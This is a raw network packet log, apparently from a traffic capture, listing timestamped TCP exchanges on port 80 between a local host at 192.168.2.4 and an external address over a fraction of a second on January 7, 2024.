                                                                                                                                                                    Jan 7, 2024 05:29:24.479899883 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.479953051 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.479996920 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.480014086 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.480031967 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.480078936 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.480099916 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.480134010 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.480216026 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.480257034 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.480282068 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.480304956 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.480324030 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.480361938 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.480449915 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.480482101 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.480494022 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.480531931 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.480556011 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.480606079 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.480667114 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.480703115 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.480741978 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.480782032 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.480788946 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.480846882 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.480918884 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.480961084 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.480982065 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.481020927 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.481024981 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.481081009 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.481118917 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.481138945 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.481158018 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.481188059 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.481220961 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.481266022 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.481314898 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.481353998 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.481374979 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.481401920 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.481446981 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.481470108 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.481509924 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.481532097 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.481606960 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.481648922 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.481692076 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.481709957 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.481750965 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.481775999 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.481823921 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.482048988 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.482095957 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.482115030 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.482156038 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.482623100 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.482687950 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.482791901 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.482839108 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.482844114 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.482882023 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.483055115 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.483146906 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.483215094 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.483261108 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.483288050 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.483339071 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.483460903 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.483541012 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.484081030 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.484154940 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.484186888 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.484234095 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.484261036 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.484361887 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.484415054 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.484457970 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.484471083 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.484513044 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.484534979 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.484611034 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.484715939 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.484755039 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.484800100 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.484843969 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.485279083 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.485359907 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.485430956 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.485477924 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.485518932 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.485563040 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.485997915 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.486143112 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.486221075 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.486270905 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.486278057 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.486319065 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.486494064 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.486629963 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.486694098 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.486731052 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.486737013 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.486773014 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.486946106 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.487035036 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.487106085 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.487153053 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.487164021 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.487202883 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.487224102 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.487272978 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.487314939 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.487353086 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.487459898 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.487520933 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.487565041 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.487584114 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.487624884 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.487768888 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.487843990 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.487912893 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.487966061 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.487986088 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.488032103 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.490087986 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.490144968 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.490197897 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.490219116 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.490344048 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.490411043 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.490453005 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.490477085 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.490516901 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.490550041 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.490609884 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.491134882 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.491177082 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.491352081 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.491394997 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.491420031 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.491530895 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.491647959 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.491695881 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.491733074 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.491774082 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.491854906 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.491938114 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.492026091 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.492065907 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.492105007 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.492152929 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.492237091 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.492317915 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.492425919 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.492466927 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.492536068 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.492579937 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.492624998 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.492693901 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.492769957 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.492815971 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.492858887 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.492911100 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.492966890 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.493012905 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.493052959 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.493097067 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.493139029 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.493177891 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.493241072 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.493283987 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.493344069 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.493396044 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.493426085 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.493510962 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.493552923 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.493566036 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.493609905 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.493695021 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.493737936 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.493774891 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.493818998 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.493868113 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.493907928 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.493976116 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.494009972 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.494045973 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.494085073 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.494142056 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.494210005 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.494223118 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.494262934 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.494345903 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.494426012 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.494440079 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.494481087 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.494611979 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.494648933 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.494667053 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.494712114 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.494735956 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.494777918 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.494786024 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.494832039 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.494910955 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.494951010 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.495014906 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.495055914 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.495104074 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.495146036 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.495199919 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.495243073 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.495621920 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.495676041 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.495683908 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.495722055 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.498545885 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.498619080 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.498677015 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.504401922 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.509435892 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.512152910 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.554400921 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.554461002 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.653425932 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.653507948 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.653512001 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.653553963 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.668370962 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.668417931 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.668440104 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.668472052 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.668975115 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.669034004 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.669121027 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.669189930 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.669991016 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.670058966 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.670080900 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.670133114 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.670141935 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.670176983 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.670186043 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.670217991 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.670254946 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.670299053 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.670346022 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.670387030 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.670447111 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.670516968 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.670563936 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.670883894 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.670953989 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.670952082 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.670996904 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.671117067 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.671199083 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.671240091 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.671334028 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.672943115 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.672991037 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.673047066 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.673172951 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.673702955 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.673753023 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.673825979 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.674084902 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.674427986 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.674484015 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.674539089 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.674601078 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.674645901 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.674748898 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.674848080 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.675029039 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.675728083 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.675792933 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.675822973 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.675874949 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.676099062 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.676167011 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.676198959 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.676223993 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.676260948 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.676301956 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.676363945 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.676403999 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.676441908 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.676487923 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.676512003 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.676553965 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.676584959 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.676623106 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.676629066 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.676661968 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:24.676778078 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.676865101 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:24.676940918 CET4973580192.168.2.491.215.85.120
